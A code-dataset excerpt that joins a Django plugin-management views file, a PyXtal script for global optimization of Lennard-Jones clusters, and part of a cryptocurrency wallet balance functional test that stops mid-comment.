deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| 38.464286 | 110 | 0.67635 | import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| true | true |
f71916d9d2b9a6b8eedcdd508d02ad5f7bc188ca | 9,543 | py | Python | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | 1 | 2019-10-25T01:10:47.000Z | 2019-10-25T01:10:47.000Z | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | null | null | null | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | null | null | null | from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
"""
This is a script to
1, generate random clusters
2, perform optimization
"""
def LJ(pos, dim, mu=0.1):
"""
Calculate the total energy
Args:
pos: 1D array with N*dim numbers representing the atomic positions
dim: dimension of the hyper/normal space
output
E: the total energy with punishing function
"""
N_atom = int(len(pos)/dim)
pos = np.reshape(pos, (N_atom, dim))
distance = pdist(pos)
r6 = np.power(distance, 6)
r12 = np.multiply(r6, r6)
Eng = np.sum(4*(1/r12 - 1/r6))
if dim > 3:
norm = 0
for i in range(3,dim):
#diff = pos[:, i] - np.mean(pos[:, i])
diff = pos[:, i]
norm += np.sum(np.multiply(diff, diff))
Eng += 0.5*mu*norm
return Eng
def LJ_force(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos,[N_atom, dim])
force = np.zeros([N_atom, dim])
for i, pos0 in enumerate(pos):
pos1 = deepcopy(pos)
pos1 = np.delete(pos1, i, 0)
distance = cdist([pos0], pos1)
r = pos1 - pos0
r2 = np.power(distance, 2)
r6 = np.power(r2, 3)
r12 = np.power(r6, 2)
force[i] = np.dot((48/r12-24/r6)/r2, r)
# force from the punish function mu*sum([x-mean(x)]^2)
if dim > 3:
for j in range(3,dim):
#force[i, j] += mu*(pos[i, j] - np.mean(pos[:, j]))
force[i, j] += mu*pos[i, j] #- np.mean(pos[:, j]))
return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
"""
perform optimization for a given cluster
Args:
pos: N*dim0 array representing the atomic positions
dim: dimension of the hyper/normal space
kt: perturbation factors
output:
energy: optmized energy
pos: optimized positions
"""
N_atom = len(pos)
diff = dim - np.shape(pos)[1]
# if the input pos has less dimensions, we insert a random array for the extra dimension
# if the input pos has more dimensions, we delete the array for the extra dimension
if diff > 0:
pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
elif diff < 0:
pos = pos[:, :dim]
pos = pos.flatten()
res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
pos = np.reshape(res.x, (N_atom, dim))
energy = res.fun
return energy, pos
def parse_symmetry(pos):
mol = Molecule(['C']*len(pos), pos)
try:
symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
except:
symbol = 'N/A'
return symbol
class LJ_prediction():
"""
A class to perform global optimization on LJ clusters
Args:
Attributes:
"""
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
#print(energy1, energy2, energy3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
#print('stop')
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
#-------------------------------- Options -------------------------
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons #38
maxN = options.max #1000
dim = options.dim #4
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| 33.250871 | 119 | 0.551085 | from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
def LJ(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos, (N_atom, dim))
distance = pdist(pos)
r6 = np.power(distance, 6)
r12 = np.multiply(r6, r6)
Eng = np.sum(4*(1/r12 - 1/r6))
if dim > 3:
norm = 0
for i in range(3,dim):
diff = pos[:, i]
norm += np.sum(np.multiply(diff, diff))
Eng += 0.5*mu*norm
return Eng
def LJ_force(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos,[N_atom, dim])
force = np.zeros([N_atom, dim])
for i, pos0 in enumerate(pos):
pos1 = deepcopy(pos)
pos1 = np.delete(pos1, i, 0)
distance = cdist([pos0], pos1)
r = pos1 - pos0
r2 = np.power(distance, 2)
r6 = np.power(r2, 3)
r12 = np.power(r6, 2)
force[i] = np.dot((48/r12-24/r6)/r2, r)
if dim > 3:
for j in range(3,dim):
force[i, j] += mu*pos[i, j]
return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
N_atom = len(pos)
diff = dim - np.shape(pos)[1]
if diff > 0:
pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
elif diff < 0:
pos = pos[:, :dim]
pos = pos.flatten()
res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
pos = np.reshape(res.x, (N_atom, dim))
energy = res.fun
return energy, pos
def parse_symmetry(pos):
mol = Molecule(['C']*len(pos), pos)
try:
symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
except:
symbol = 'N/A'
return symbol
class LJ_prediction():
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons
maxN = options.max
dim = options.dim
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| true | true |
f7191733ac9155fe9da162a2124c9882e8a0a396 | 12,464 | py | Python | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | 1 | 2019-12-09T18:33:47.000Z | 2019-12-09T18:33:47.000Z | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | null | null | null | test/functional/wallet_balance.py | bitcorub/bitrub | 28711e4e8ebdee144a1437ece07afcf792a7cf60 | [
"MIT"
] | 1 | 2019-12-12T20:05:36.000Z | 2019-12-12T20:05:36.000Z | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The BitRub Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet balance RPC methods."""
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
# Create and sign raw transactions from node to address for amt.
# Creates a transaction for each fee and returns an array
# of the raw transactions.
utxos = [u for u in node.listunspent(0) if u['spendable']]
# Create transactions
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
# make sure there was enough utxos
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
# prevent 0 change output
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'], # Limit mempool descendants as a hack to have wallet txs rejected from the mempool
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
# Check that nodes don't own any UTXOs
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
# tracking of transaction trust for summing balances doesn't consider
# which inputs belong to a user. In this case, the change output in
# question could be "destroyed" by replace the 1st transaction above.
#
# The post #16766 behavior is correct; we shouldn't be treating those
# funds as confirmed. If you want to rely on that specific UTXO existing
# which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0')) # node 1's send had an unsafe input
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1) # Doesn't include output of node 0's send since it was spent
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
# Node 1 bumps the transaction fee and resends
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
# balances are correct after the transactions are confirmed
assert_equal(self.nodes[0].getbalance(), Decimal('69.99')) # node 1's send plus change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('29.98')) # change from node 0's send
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
